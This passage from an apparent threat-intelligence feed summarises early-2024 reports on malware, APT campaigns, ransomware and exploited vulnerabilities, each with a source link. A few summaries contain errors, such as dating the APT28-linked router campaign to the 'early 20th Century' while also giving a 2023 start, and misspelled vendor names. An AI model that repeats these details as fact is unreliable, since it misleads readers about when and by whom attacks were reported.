Summary:: Researchers from Cybereason have looked into instances when Ivanti VPN appliances' recently discovered vulnerabilities known as zero-days were exploited. These vulnerabilities were not patched at the time of disclosure. Ivanti urged users to implement quick mitigations for two significant vulnerabilities impacting their Connect Secure and Policy Secure systems, which were identified as CVE-2023-46805 and CVE-2024-21887, on January 10, 2024. A third party published a Proof of Concept (PoC) on January 16, 2024, which led to an increase in the scope of exploitation. In addition to the existing threat, Ivanti disclosed two additional vulnerabilities on January 31st: CVE-2024-21888, which is a privilege escalation flaw, and CVE-2024-21893, which is an SSRF web vulnerability. These vulnerabilities increase the need for action and increased security awareness while the manufacturer continues to work on developing and delivering suitable mitigations.

Source: https://www.cybereason.com/blog/threat-alert-ivanti-connect-secure-vpn-zero-day-exploitation

Intel Source:: MP.WEIXIN.QQ

Intel Name:: Kimsuky_APT_Evolving_Tactics_targeted_Cyber_Espionage_Campaign

Date of Scan:: 2024-02-06

Impact:: LOW

Summary:: Kimsuky APT, known for targeting South Korean military, expands cyber espionage to government entities. Recent tactics involve deceptive LNK files, with a focus on the financial sector. The group employs advanced techniques, including cloud services for communication, indicating an evolving threat landscape. Cybersecurity vigilance is crucial in countering Kimsuky's sophisticated and fileless attacks.

Source: https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ%3D%3D&mid=2247522061&idx=1&sn=22e56ee213d9e5229371ad3e082ebfab

Intel Source:: SeeBug

Intel Name:: New_Trojan_Tools_Used_by_APT_K_47_Group

Date of Scan:: 2024-02-06

Impact:: LOW

Summary:: Researchers from SeeBug have discovered that the APT-K-47 group used an undisclosed Trojan tool. Following a successful intrusion, the tool downloads additional malicious payloads and ORPCBackdoor, traverses disk directories to steal target files, and then sends the data back to the command and control server (C2). Simultaneously, the group transmitted the password information back after stealing it from the target computer's browser.

Source: https://paper.seebug.org/3115/

Intel Source:: Krebsonsecurity

Intel Name:: Alleged_Medibank_Hacker_Aleksandr_Ermakov

Date of Scan:: 2024-02-06

Impact:: LOW

Summary:: The article discusses the recent financial sanctions imposed on Russian man Aleksandr Ermakov for his alleged involvement in the hacking of Australian health insurance company Medibank. Ermakov is believed to have worked with the ransomware group REvil and is accused of stealing and leaking sensitive data of 10 million customers. The section provides information on Ermakov's aliases, his connection to REvil, and his involvement in other cybercrime activities. It also mentions his affiliation with a Russian technology firm and his connection to a cybercriminal known as "Rescator." The article also discusses the potential impact of the sanctions on Ermakov's life and the challenges he may face in Russia as a result.

Source: https://krebsonsecurity.com/2024/01/who-is-alleged-medibank-hacker-aleksandr-ermakov/

Intel Source:: Fortinet

Intel Name:: The_distribution_of_Python_Info_stealer

Date of Scan:: 2024-02-06

Impact:: LOW

Summary:: In January 2024, FortiGuard Labs obtained an Excel document distributing an info-stealer related to a Vietnamese group first reported in August 2023. The attack uses simple downloaders to increase detection difficulty. The info-stealer collects browsers' cookies and login data, compresses it, and sends it to the attacker's telegram bot.

Source: https://www.fortinet.com/blog/threat-research/python-info-stealer-malicious-excel-document

Intel Source:: GROUP-IB

Intel Name:: APAC_Job_Seekers_Data_Compromised_In_Massive_Breach

Date of Scan:: 2024-02-06

Impact:: LOW

Summary:: GROUP-IB researchers have discovered that ResumeLooters successfully targeted a minimum of 65 websites in 2023, using straightforward techniques such as SQL injection and XSS. The threat actor sought to insert XSS scripts into all accessible forms, with the intention of executing them on administrators' devices to acquire admin credentials.

Source: https://www.group-ib.com/blog/resumelooters/

Intel Source:: BI.ZONE

Intel Name:: Scaly_Wolf_Attacks_Russian_Business_With_White_Snake_Stealer

Date of Scan:: 2024-02-06

Impact:: LOW

Summary:: Researchers from BI.ZONE have connected the Scaly Wolf organization to at least ten campaigns. Russian companies across a range of industries, including manufacturing and logistics, faced attacks. One of the group's quirks is that they send phishing emails pretending to be Russian government agencies in order to obtain first access. The requirements of Roskomnadzor, the Russian Federation's Investigative Committee, and the Military Prosecutor's Office of the Russian Federation are among the tools in the criminals' phishing armory. Attackers occasionally pose as commercial offers in emails.

Source: https://bi.zone/expertise/blog/scaly-wolf-primenyaet-stiler-white-snake-protiv-rossiyskoy-promyshlennosti/

Intel Source:: Sentilone

Intel Name:: A_malware_campaign_infecting_cracked_macOS_apps

Date of Scan:: 2024-02-05

Impact:: LOW

Summary:: Researchers discovered a malware campaign infecting cracked macOS apps from torrent sites to install a backdoor for further malware delivery. The malware disables security settings and then uses Python scripts to achieve persistence and retrieve additional payloads.

Source: https://www.sentinelone.com/blog/backdoor-activator-malware-running-rife-through-torrents-of-macos-apps/

Intel Source:: Akamai

Intel Name:: FritzFrog_Botnet_Currently_Using_Log4Shell_Bug

Date of Scan:: 2024-02-05

Impact:: MEDIUM

Summary:: Akamai researchers have provided an explanation for the change in the FritzFrog botnet, which has been in existence since 2020. Typically, the botnet leverages brute-force attacks to breach SSH, a network connection protocol, in order to access servers and launch cryptominers. However, more recent versions now scan many system files on infected computers to identify targets that are very likely to be weak points for this attack.

Source: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell

Intel Source:: Harfanglab

Intel Name:: The_exploitation_of_compromised_routers_to_target_goverment_in_Europe_and_Caucasus

Date of Scan:: 2024-02-05

Impact:: MEDIUM

Summary:: A look back at a malicious espionage campaign that targeted government organisations in Ukraine and Poland in the early 20th Century and may have been carried out by a threat-actor known as APT28. HarfangLab identified additional malicious files and infrastructure which they believe with high confidence are part of the same campaign. The campaign targeted government organisations in Ukraine and Poland at least (and possibly in Azerbaijan as well), started on 2023-12-13 at the latest, and abused legitimate Ubiquity network devices as infrastructure. HarfangLab could not reliably link the described campaign with APT28 in particular.

Source: https://harfanglab.io/en/insidethelab/compromised-routers-infrastructure-target-europe-caucasus/

Intel Source:: RexorVc0

Intel Name:: Diving_Deep_into_Pony_Malware

Date of Scan:: 2024-02-05

Impact:: LOW

Summary:: Pony, also called Fareit or Siplog, is a malware that is classified as a loader and stealer but may also be used as a botnet because it has been around for over a decade and is still in use. This notorious malware is still available for purchase, is still receiving upgrades, and has been used to launch other malware during attacks on victim infrastructures in addition to stealing confidential data.

Source: https://rexorvc0.com/2024/02/04/Pony_Fareit/

Intel Source:: PaloAlto

Intel Name:: Examining_the_Newest_Stealer_Variant_of_Mispadu

Date of Scan:: 2024-02-05

Impact:: LOW

Summary:: Researchers from Unit 42 have recently found activities linked to the covert infostealer known as Mispadu Stealer, who was first identified in 2019. In their search for ways to exploit the CVE-2023-36025 vulnerability in this instance, they came upon a family of infostealer malware that targets particular areas and URLs that are frequently connected to Mexican nationals.

Source: https://unit42.paloaltonetworks.com/mispadu-infostealer-variant/

Intel Source:: Any.Run

Intel Name:: CrackedCantil_malware

Date of Scan:: 2024-02-05

Impact:: LOW

Summary:: AnyRun researchers dive into a recent case of something they call a “malware symphony.” It’s a way to describe how different types of malware can work together, sort of like instruments in an orchestra.

Source: https://any.run/cybersecurity-blog/crackedcantil-breakdown/

Intel Source:: Cado Security

Intel Name:: Examining_New_Malware_Operation_Aimed_Against_Docker

Date of Scan:: 2024-02-05

Impact:: LOW

Summary:: Researchers at Cado have discovered the commando cat malware campaign, which targets Docker API endpoints exposed to the public. Since the start of 2024, there have been two campaigns that have targeted Docker. The first was the malicious deployment of the 9hits traffic exchange application, the results of which were reported just a few weeks ago.

Source: https://www.cadosecurity.com/the-nine-lives-of-commando-cat-analysing-a-novel-malware-campaign-targeting-docker/

Intel Source:: Securonix

Intel Name:: New_SUBTLE_PAWS_PowerShell_Backdoor_Drops_on_Ukraine

Date of Scan:: 2024-02-02

Impact:: MEDIUM

Summary:: Securonix researchers have identified an ongoing campaign (tracked as STEADY#URSA) that is likely tied to Shuckworm and targets military personnel in Ukraine. Perhaps via phishing emails, compressed files are used to transmit the harmful payload. The study found that military jargon and references to Ukrainian cities were present in a large number of the samples. Given that the attack includes multiple TTPs that are only utilized by the organization and have been mentioned in previous campaigns against the Ukrainian military, it is most likely connected to Shuckworm.

Source: https://www.securonix.com/blog/security-advisory-steadyursa-attack-campaign-targets-ukraine-military/

Intel Source:: ASEC

Intel Name:: Hackers_Establishing_Backdoor_Accounts_on_Linux

Date of Scan:: 2024-02-02

Impact:: LOW

Summary:: Attack campaigns that involve installing a backdoor account on unmanaged Linux SSH servers have been identified for a long time. Threat actors will have the option to either sell the credentials they have gathered from the compromised systems on the dark web or utilize the extra backdoor accounts to later install malware strains like ransomware, CoinMiners, and DDoS bots on the compromised system.

Source: https://asec.ahnlab.com/en/61185/

Intel Source:: Cloudflare

Intel Name:: An_Incident_Occurred_During_Thanksgiving_2023

Date of Scan:: 2024-02-02

Impact:: LOW

Summary:: On November 23, 2023, Thanksgiving Day, Cloudflare discovered a threat actor on our Atlassian server that we host ourselves. Their security team shut down the threat actor's access right away, launched an investigation, and on Sunday, November 26, they invited CrowdStrike's Forensic team to do their own independent study.

Source: https://blog.cloudflare.com/thanksgiving-2023-security-incident

Intel Source:: Palo Alto

Intel Name:: A_large_scale_campaign_called_ApateWeb

Date of Scan:: 2024-02-01

Impact:: LOW

Summary:: Unit 42 researchers discovered a large-scale campaign we call ApateWeb that uses a network of over 130,000 domains to deliver scareware, potentially unwanted programs (PUPs), and other scam pages. Among these PUPs, we have identified several adware programs including a rogue browser and different browser extensions.

Source: https://unit42.paloaltonetworks.com/apateweb-scareware-pup-delivery-campaign/

Intel Source:: Cado Security

Intel Name:: A_novel_cryptojacking_campaign_Commando_Cat

Date of Scan:: 2024-02-01

Impact:: LOW

Summary:: Cado researchers have recently observed a new malware campaign, called “Commando Cat”, which targeted exposed Docker API endpoints. This is the second time targeting Docker since 2024 started the first being the malicious deployment of the 9hits traffic exchange application.

Source: https://www.cadosecurity.com/the-nine-lives-of-commando-cat-analysing-a-novel-malware-campaign-targeting-docker/

Intel Source:: Malwarebytes

Intel Name:: A_recent_Nitrogen_malware_campaign

Date of Scan:: 2024-02-01

Impact:: LOW

Summary:: Malwarebytes in their blog analyzed a recent Nitrogen campaign and how the initial payload is being served to victims. The threat actors prefer to host their payloads on compromised WordPress sites, many of which are already hacked with malicious PHP shell scripts.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/01/nitrogen-shelling-malware-from-hacked-sites

Intel Source:: CERT-UA

Intel Name:: Over_2000_PCs_in_Ukraine_Impacted_by_DIRTYMOE

Date of Scan:: 2024-02-01

Impact:: MEDIUM

Summary:: For over five years, DIRTYMOE has been recognized as a modular malware. provides technical tools for remote computer access, and it's primarily (though not only) employed for mining and DDoS attacks. Typically, using widely used software that comes with an MSI installer causes the initial damage. A rootkit installed in the backdoor hinders the removal of operating system components from the file system and registry when the system is in normal mode.

Source: https://cert.gov.ua/article/6277422

Intel Source:: Synacktiv

Intel Name:: KRUSTYLOADER_RUST_malware_analysis

Date of Scan:: 2024-02-01

Impact:: LOW

Summary:: On 18th January, it was an observation of the new evidence of compromised Ivanti Connect Secure instances by Volexity who published their observations which include hashes of Rust payloads downloaded on compromised instances. Synacktiv shared in their article a malware analysis of these unidentified Rust payloads that was labeled as KrustyLoader.

Source: https://www.synacktiv.com/publications/krustyloader-rust-malware-linked-to-ivanti-connectsecure-compromises

Intel Source:: Stairwell

Intel Name:: A_new_variant_of_VileRAT_malware

Date of Scan:: 2024-02-01

Impact:: LOW

Summary:: Last month, Stairwell’s research team observed a new variant of VileRAT that has been circulating since August 2023. After some public reports and detecting filenames. The analysis showed that this variant is being distributed through fake software piracy sites to broadly infect systems.

Source: https://stairwell.com/resources/technical-analysis-the-silent-torrent-of-vilerat/

Intel Source:: TrendMicro

Intel Name:: An_Attack_Using_Stealth_And_Brute_Force

Date of Scan:: 2024-01-31

Impact:: LOW

Summary:: TrendMicro researchers have found that Pawn Storm remains unwavering in its pursuit to breach the networks and email accounts of high-profile targets worldwide. The group initially employed brute-force attacks from dedicated servers and later integrated more anonymization layers like commercial VPN services and Tor.

Source: https://www.trendmicro.com/en_us/research/24/a/pawn-storm-uses-brute-force-and-stealth.html

Intel Source:: Proofpoint

Intel Name:: The_Return_of_TA576

Date of Scan:: 2024-01-31

Impact:: LOW

Summary:: Researchers at Proofpoint have discovered the reappearance of TA576, a cybercriminal threat actor that targets accounting and finance companies in particular with tax-themed baits. This actor mostly targets North American organizations with low-volume email campaigns, and is only active during the first few months of the year during tax season in the United States. In every campaign, the actor will try to distribute remote access trojans (RATs) and will respond to emails asking for help with tax preparation.

Source: https://www.proofpoint.com/us/blog/threat-insight/security-brief-tis-season-tax-hax

Intel Source:: Cluster25

Intel Name:: The_Russian_Opposition_Faces_New_Campaign

Date of Scan:: 2024-01-31

Impact:: LOW

Summary:: Researchers from Cluster25 have discovered a recently launched campaign that is probably connected to a Russian APT organization. The spear-phishing mails used in this effort went after organizations that supported Russian dissident movements and were publicly critical of the Russian government, both inside and outside the country.

Source: https://blog.cluster25.duskrise.com/2024/01/30/russian-apt-opposition

Intel Source:: Welivesecurity

Intel Name:: The_Grandoreiro_banking_trojan_operation

Date of Scan:: 2024-01-31

Impact:: LOW

Summary:: ESET has provided technical analysis, statistical information, and known command and control (C&C) server domain names and IP addresses. Due to a design flaw in Grandoreiro’s network protocol, ESET researchers were also able to get a glimpse into the victimology.

Source: https://www.welivesecurity.com/en/eset-research/eset-takes-part-global-operation-disrupt-grandoreiro-banking-trojan/

Intel Source:: CSIRT-CTI

Intel Name:: China_linked_hackers_target_Myanmar_s_top_ministries

Date of Scan:: 2024-01-31

Impact:: MEDIUM

Summary:: Mustang Panda, the China-based threat actor has targeted Myanmar's Ministry of Defence and Foreign Affairs as part of twin campaigns designed to deploy backdoors and remote access trojans.

Source: https://csirt-cti.net/2024/01/23/stately-taurus-targets-myanmar/

Intel Source:: Mandiant

Intel Name:: The_Hidden_Depths_of_USB_Malware

Date of Scan:: 2024-01-31

Impact:: LOW

Summary:: Mandiant researchers have discovered a distinct evolution in the TTPs from the campaign's early stages, commencing with the use of the explorer.ps1 payload featuring a custom decoding scheme. This progressed to the adoption of asymmetric encryption, accompanied by the incorporation of device tracking capabilities.

Source: https://www.mandiant.com/resources/blog/unc4990-evolution-usb-malware

Intel Source:: Inquest

Intel Name:: The_malicious_URL_file_uses

Date of Scan:: 2024-01-30

Impact:: LOW

Summary:: Inquest shared their details about the exploration of URL files, and their resurgence in the threat space as various vulnerabilities and exposures have led to adversaries finding utility in this simple file type.

Source: https://inquest.net/blog/shortcut-to-malice-url-files/

Intel Source:: ASEC

Intel Name:: Attacker_of_Trigona_Ransomware_Using_Mimic_Ransomware

Date of Scan:: 2024-01-30

Impact:: LOW

Summary:: ASEC researchers discovered a new way that the threat actor behind the Trigona ransomware is installing Mimic ransomware. Similar to previous instances, the newly discovered attack focuses on MS-SQL servers and is noteworthy for exploiting the MS-SQL servers' Bulk Copy Program (BCP) feature to install malware.

Source: https://asec.ahnlab.com/en/61000/

Intel Source:: Fortinet

Intel Name:: Albabat_Ransomware_roundup

Date of Scan:: 2024-01-30

Impact:: MEDIUM

Summary:: FortiGuard Labs analysts researched data for a ransomware variant that triggered their attention called Albabat. Albabat, also known as White Bat, is a money-motivated ransomware variant written in Rust that finds and encrypts files important to the user and demands a ransom to release them. It first appeared last November, 2023. The affected platforms are Microsoft Windows and impacted parties are Microsoft Windows Users.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-albabat

Intel Source:: Zscaler

Intel Name:: Zloader_Returned_With_New_Iteration

Date of Scan:: 2024-01-30

Impact:: LOW

Summary:: Zscaler researchers have discovered that Zloader has comeback with an updated version, signaling a potential increase in ransomware attacks. The latest iteration of Zloader includes significant enhancements to its loader module, incorporating RSA encryption, an improved Domain Generation Algorithm (DGA), and advanced obfuscation techniques. Additionally, the malware now employs more junk code, API import hashing, and string encryption, making it more resilient against malware analysis.

Source: https://www.zscaler.com/blogs/security-research/zloader-no-longer-silent-night

Intel Source:: Red Canary

Intel Name:: MSIX_installers_deliver_malware_payloads

Date of Scan:: 2024-01-30

Impact:: LOW

Summary:: Starting in July 2023, Red Canary began investigating a series of attacks by adversaries leveraging MSIX files to deliver malware. The adversaries in each intrusion appeared to be using malicious advertising or SEO poisoning to draw in victims, who believed that they were downloading legitimate software such as Grammarly, Microsoft Teams, Notion, and Zoom.

Source: https://redcanary.com/blog/msix-installers/

Intel Source:: Cybereason

Intel Name:: Examining_DarkGate_Loader_in_Depth

Date of Scan:: 2024-01-30

Impact:: LOW

Summary:: Researchers at Cybereason have looked at occurrences involving the modular loader known as DarkGate Loader, which is sent via phishing emails and is in charge of delivering payloads that are used after an attack. Threat actors use the AutoIt script DarkGate Loader to deliver an encrypted payload. The payload is decrypted and injected into various processes by the AutoIt script. In the end, using DarkGate Loader triggers the use of post-exploitation tools like Meterpreter and Cobalt Strike.

Source: https://www.cybereason.com/hubfs/dam/collateral/reports/darkgate-threat-alert.pdf

Intel Source:: Netenrich

Intel Name:: A_Deep_Dive_into_Alpha_Ransomware

Date of Scan:: 2024-01-30

Impact:: LOW

Summary:: Netenrich group researchers provided updates for Alpha ransomware, a completely different group then ALPHV ransomware, which has recently emerged with the launch of its Dedicated/Data Leak Site on the Dark Web and an initial listing of six victims’ data.

Source: https://netenrich.com/blog/alpha-ransomware-a-deep-dive-into-its-operations

Intel Source:: AT&T and PaloAlto

Intel Name:: Microsoft_Teams_Delivers_DarkGate_Malware

Date of Scan:: 2024-01-30

Impact:: MEDIUM

Summary:: Although the majority of end users are probably aware of the risks associated with traditional phishing attacks, such those that arrive by email or other media, many are probably not aware that Microsoft Teams chats could also be a potential source of phishing attacks. While most Teams activity takes place within an organization, Microsoft by default permits users to add persons from outside the organization to their Teams chats. This function has, somewhat unsurprisingly, given bad actors a new way to take advantage of unsuspecting or inexperienced consumers.

Source: https://cybersecurity.att.com/blogs/security-essentials/darkgate-malware-delivered-via-microsoft-teams-detection-and-response https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2023-10-12-IOCs-for-DarkGate-from-Teams-chat.txt

Intel Source:: Fortinet

Intel Name:: An_Additional_Phobos_Ransomware_Variant_Initiates_an_Attack

Date of Scan:: 2024-01-29

Impact:: LOW

Summary:: Researchers from FortiGuard Labs have discovered an Office document that includes a VBA script meant to spread the FAUST ransomware, which is a different kind of Phobos. The attackers stored many Base64-encoded files, each containing a malicious binary, using the Gitea service. These files start a file encryption attack when they are inserted into the memory of a system.

Source: https://www.fortinet.com/blog/threat-research/phobos-ransomware-variant-launches-attack-faust

Intel Source:: ISC.SANS

Intel Name:: A_Batch_File_Holding_Several_Payloads

Date of Scan:: 2024-01-29

Impact:: LOW

Summary:: Although most people consider Windows batch files (.bat) to be extremely basic, they can actually be fairly complicated or include intriguing encoded payloads. One that a Powershell process was using and had several decoded payloads was discovered by researchers. The trick to adding comments to these kinds of files is in the magic. "REM" is the default (or most popular) keyword to use.

Source: https://isc.sans.edu/diary/rss/30592

Intel Source:: Blackberry

Intel Name:: Persistent_Cyber_Threats_Targeting_Mexican_Entities

Date of Scan:: 2024-01-29

Impact:: LOW

Summary:: The BlackBerry Threat Research and Intelligence team have found that cyber attackers are consistently targeting Mexican organizations for financial gains. They use legitimate Mexican government resources, such as the IDSE software update document and the IMSS payment system SIPARE.

Source: https://blogs.blackberry.com/en/2024/01/mexican-banks-and-cryptocurrency-platforms-targeted-with-allakore-rat

Intel Source:: SOC Radar

Intel Name:: Russian_APT_Operation_Star_Blizzard

Date of Scan:: 2024-01-29

Impact:: MEDIUM

Summary:: Star Blizzard's strategies operate in the ever-evolving cyber threat arena with a measured precision that is akin to a strategic orchestration. In this case, spear-phishing mimics a method that has been meticulously thought out and carried out. This elusive group, with an advanced level of intelligence akin to that of seasoned professionals, methodically pinpoints individual and group members as their intended audience.

Source: https://socradar.io/russian-apt-operation-star-blizzard/

Intel Source:: The DFIR Report

Intel Name:: Attackers_Exploiting_Publicly_Exposed_RDP_Host

Date of Scan:: 2024-01-29

Impact:: MEDIUM

Summary:: Researchers for The DFIR report saw threat actors in late December 2022 taking advantage of a publicly accessible Remote Desktop Protocol server, which resulted in the exfiltration of data and the installation of the Trigona ransomware. The threat actors spread ransomware throughout the network on Christmas Eve, just three hours after they first gained access.

Source: https://thedfirreport.com/2024/01/29/buzzing-on-christmas-eve-trigona-ransomware-in-3-hours/

Intel Source:: Cyble

Intel Name:: An_ongoing_phishing_campaign_spreads_with_an_Atomic_Stealer_version

Date of Scan:: 2024-01-26

Impact:: MEDIUM

Summary:: Cyble researchers discovered a new version of AMOS Stealer going thru website and pretending like legit Mac applications, including Parallels Desktop, CleanMyMac, Arc Browser, and Pixelmator. Earlier this year, the AMOS stealer has been circulating via Google Ads, serving as the main distribution method.

Source: https://cyble.com/blog/uncovering-atomic-stealer-amos-strikes-and-the-rise-of-dead-cookies-restoration/

Intel Source:: Sonatype

Intel Name:: Malware_Drops_From_Fake_NPM_Package

Date of Scan:: 2024-01-25

Impact:: LOW

Summary:: Researchers from Sonatype have discovered two npm packages, distube-config and discordyt, that mimic open source products such as Discord modules in an effort to infect Windows users with a Trojan.

Source: https://blog.sonatype.com/fake-distube-config-npm-package-drops-windows-info-stealing-malware

Intel Source:: Arcticwolf

Intel Name:: Mimicking_CherryTree_to_Deploy_PrawEsc_Exploits

Date of Scan:: 2024-01-25

Impact:: LOW

Summary:: According to Arctic Wolf researchers, the loader poses as the authentic CherryTree note-taking program through its name and symbol, tricking potential victims into installing it. They have found evidence of this new attack tool in two recent incidents.

Source: https://arcticwolf.com/resources/blog/cherryloader-a-new-go-based-loader-discovered-in-recent-intrusions/

Intel Source:: Shadowstackre

Intel Name:: Cactus_Ransomware_continued_activity

Date of Scan:: 2024-01-25

Impact:: LOW

Summary:: On January 20th, the Cactus ransomware group targeted again a large number of victims across different industries. The attacks were revealed with the victim's data on their leak site. The ransomware group constantly puts a lot of pressure on victims by revealing their personal information about employees of the victim organization; this has included driver's licenses, passports, pictures, and other personal identification.

Source: https://www.shadowstackre.com/analysis/cactus

Intel Source:: Palo Alto

Intel Name:: The_BianLian_ransomware_group

Date of Scan:: 2024-01-25

Impact:: MEDIUM

Summary:: The article discusses the detection and prevention of the BianLian encryptor and backdoor by Cortex XDR, as well as the use of SmartScore and protections offered by Palo Alto Networks. It also provides a list of IP addresses associated with the BianLian ransomware gang and additional resources for further information. The article also explores a potential connection between the BianLian and Makop ransomware groups and provides a technical analysis of the attack lifecycle of the BianLian group. It includes screenshots of alerts and prevention measures taken by Cortex XDR. The article also lists various codes and IP addresses related to the threat assessment of the malware.

Source: https://unit42.paloaltonetworks.com/bianlian-ransomware-group-threat-assessment/

Intel Source:: Welivesecurity

Intel Name:: New_China_Aligned_APT_Group_Called_Blackwood_Using_NSPX30_implants

Date of Scan:: 2024-01-25

Impact:: MEDIUM

Summary:: Researchers from ESET have presented a study of an attack carried out by Blackwood, a previously unidentified threat actor that they believe has been active since at least 2018. Blackwood is associated with China. Using adversary-in-the-middle (AitM) attacks, the attackers distribute a sophisticated implant they have termed NSPX30. They do this by taking advantage of update requests that are made by legal software.

Source: https://www.welivesecurity.com/en/eset-research/nspx30-sophisticated-aitm-enabled-implant-evolving-since-2005/

Intel Source:: Security Affairs

Intel Name:: An_Italian_Adaptive_Phishing_Campaign_called_MY_SLICE

Date of Scan:: 2024-01-25

Impact:: LOW

Summary:: A highly targeted phishing attempt last year targeted email account holders of Italian organizations under the alias "My slice," which was formed from the name of a variable in the landing page's javascript code.

Source: https://securityaffairs.com/157914/cyber-crime/my-slice-aitalian-adaptive-phishing-campaign.html

Intel Source:: ITOCHU Cyber & Intelligence Inc.

Intel Name:: The_Evolution_of_LODEINFO_Fileless_Malware

Date of Scan:: 2024-01-25

Impact:: LOW

Summary:: ITOCHU Cyber & Intelligence Inc. researchers have discovered an updated variant of the LODEINFO backdoor, which is disseminated through spear-phishing attacks. Both new features and modifications to the anti-analysis (analysis avoidance) strategies have been added to the malware.

Source: https://blog-en.itochuci.co.jp/entry/2024/01/24/134100

Intel Source:: Palo Alto

Intel Name:: Parrot_TDS_malware_campaign

Date of Scan:: 2024-01-24

Impact:: MEDIUM

Summary:: The article provides an overview of the Parrot TDS malware campaign, which has been active for over four years and continues to evolve with new techniques and obfuscations. The campaign targets victims globally and uses automatic tools to exploit known vulnerabilities, with the majority of compromised servers using WordPress, Joomla, or other content management systems. The article includes a list of codes and identifiers related to the campaign, as well as examples of the landing and payload scripts used. It also discusses the protections and mitigations offered by Palo Alto Networks and provides indicators of compromise for detecting and defending against malware.

Source: https://unit42.paloaltonetworks.com/parrot-tds-javascript-evolution-analysis/

Intel Source:: ASEC

Intel Name:: Kasseika_Ransomware_Exploiting_LNK_Vulnerabilities

Date of Scan:: 2024-01-24

Impact:: MEDIUM

Summary:: AhnLab Security Intelligence Center exposes a stealthy attack leveraging a malicious Word document disguised as an .lnk shortcut file. The attack, featuring the notorious AsyncRAT (VenomRAT), uses PowerShell commands and external URLs to download and execute payloads. The malware disguises itself as a Korean company's certificate, making detection challenging.

Source: https://asec.ahnlab.com/en/60805/

Intel Source:: Infoblox

Intel Name:: Massive_Criminal_Affiliate_Program_by_Vextrio

Date of Scan:: 2024-01-24

Impact:: LOW

Summary:: Researchers from Infoblox expose a complex web of affiliations within the cybercrime ecosystem, focusing on prominent actors like VexTrio, ClearFake, and SocGholish. Collaboratively researched with security expert Randy McEoin, the study reveals these entities' involvement in malicious activities, particularly in operating traffic distribution systems (TDS). VexTrio, a major player, is identified as the most pervasive threat in customer networks, acting as a traffic broker for over 60 affiliates. The research sheds light on their unique TDS model, attack chains involving multiple actors, and their exploitation of referral programs. The findings emphasize the critical role of TDS enterprises in the vast cybercrime economy and advocate for increased industry collaboration to counter these threats effectively.

Source: https://blogs.infoblox.com/cyber-threat-intelligence/cybercrime-central-vextrio-operates-massive-criminal-affiliate-program/

Intel Source:: Reversing Labs

Intel Name:: Attackers_Using_GitHub_to_Store_Stolen_Data

Date of Scan:: 2024-01-23

Impact:: LOW

Summary:: Two malicious packages on the npm open source package manager have been found by Revealing Labs researchers. These packages use GitHub to store stolen Base64-encrypted SSH keys that were taken from developer workstations that installed them.

Source: https://www.reversinglabs.com/blog/gitgot-cybercriminals-using-github-to-store-stolen-data

Intel Source:: Project Discovery, ISC.SANS, Picus Security

Intel Name:: Update_on_Atlassian_Exploit_Activity_of_critical_vulnerabilty_CVE_2023_22527

Date of Scan:: 2024-01-23

Impact:: HIGH

Summary:: Exploit activity against Atlassian Confluence servers has exploded last couple days. The combination of a simple-to-exploit vulnerability and a potential set of high-value targets makes this an ideal vulnerability for many attackers. On January 16, 2024, Atlassian shared a disclosure about a remote code execution vulnerability affecting the Confluence Data Center and Confluence Server. CVE-2023-22527 is an OGNL injection vulnerability with a CVSS score of 10. This critical vulnerability poses a significant risk to organizations.

Source: https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/ https://isc.sans.edu/diary/Scans%20Exploit%20Attempts%20for%20Atlassian%20Confluence%20RCE%20Vulnerability%20CVE-2023-22527/30576 https://isc.sans.edu/diary/0 https://www.picussecurity.com/resource/blog/cve-2023-22527-another-ognl-injection-leads-to-rce-in-atlassian-confluence

Intel Source:: ASEC

Intel Name:: New_Legitimate_Program_Unveiled_In_DLL_Side_Loading_Attack

Date of Scan:: 2024-01-23

Impact:: LOW

Summary:: AhnLab Security Intelligence Center (ASEC) reveals the Lazarus Group's latest cyber threat tactic involving a new legitimate program, "wmiapsrv.exe," discovered on January 12, 2024. This program, utilized in DLL side-loading attacks (T1574.002), loads modified malicious DLLs, such as "wbemcomn.dll" and "netutils.dll," serving as backdoors. The verification routine in wbemcomn.dll involves unique system information, making this an Advanced Persistent Threat (APT) attack aimed at specific systems.

Source: https://asec.ahnlab.com/en/60792/

Intel Source:: TrendMicro

Intel Name:: Ransomware_Kasseika_Using_BYOVD_Attacks

Date of Scan:: 2024-01-23

Impact:: LOW

Summary:: TrendMicro researchers have examined the Kasseika ransomware and the indications they discovered imply that the perpetrators had obtained the source code of the infamous BlackMatter ransomware.

Source: https://www.trendmicro.com/en_us/research/24/a/kasseika-ransomware-deploys-byovd-attacks-abuses-psexec-and-expl.html

Intel Source:: Cyble

Intel Name:: MetaStealer_Malware_Targeting_US_Asylum_Seekers

Date of Scan:: 2024-01-23

Impact:: LOW

Summary:: Researchers at Cyble have discovered a ZIP archive file that may be downloaded from a URL and might be shared via spam emails. There is a shortcut LNK file hidden as a PDF document inside the ZIP package. The VPN application launches when the shortcut file is executed, and it uses DLL sideloading to load a hidden malicious DLL. The DLL and the VPN program are both hidden within a ZIP file.

Source: https://cyble.com/blog/threat-actors-target-us-asylum-seekers-with-metastealer-malware/

Intel Source:: Fortinet

Intel Name:: PyPI_Packages_That_Steal_Information

Date of Scan:: 2024-01-23

Impact:: LOW

Summary:: Researchers from FortiGate have discovered a PyPI malware creator (known only by the ID "WS") who subtly uploads malicious packages to PyPI. According to their current estimates, there could be more than 2000 "WS" victims from the shipments listed below alone.

Source: https://www.fortinet.com/blog/threat-research/info-stealing-packages-hidden-in-pypi

Intel Source:: Sentinelone

Intel Name:: Hackers_Targeting_Cybersecurity_Professionals

Date of Scan:: 2024-01-23

Impact:: MEDIUM

Summary:: Researchers at SentinelLabs have noticed a campaign by ScarCruft, a possible APT outfit based in North Korea, that targets prominent figures with knowledge of North Korean affairs as well as media outlets. ScarCruft is experimenting with new infection chains, one such trial was using a technical threat research paper as a ruse, presumably aimed at threat information users such as cybersecurity experts.

Source: https://www.sentinelone.com/labs/a-glimpse-into-future-scarcruft-campaigns-attackers-gather-strategic-intelligence-and-target-cybersecurity-professionals/

Intel Source:: Securelist

Intel Name:: Backdoor_in_macOS_Steals_Cryptowallets

Date of Scan:: 2024-01-22

Impact:: LOW

Summary:: Researchers at Securelist have discovered a new type of macOS malware that was previously unidentified and using software that has been cracked. The danger turned out to be much more serious than installing a proxy server without authorization.

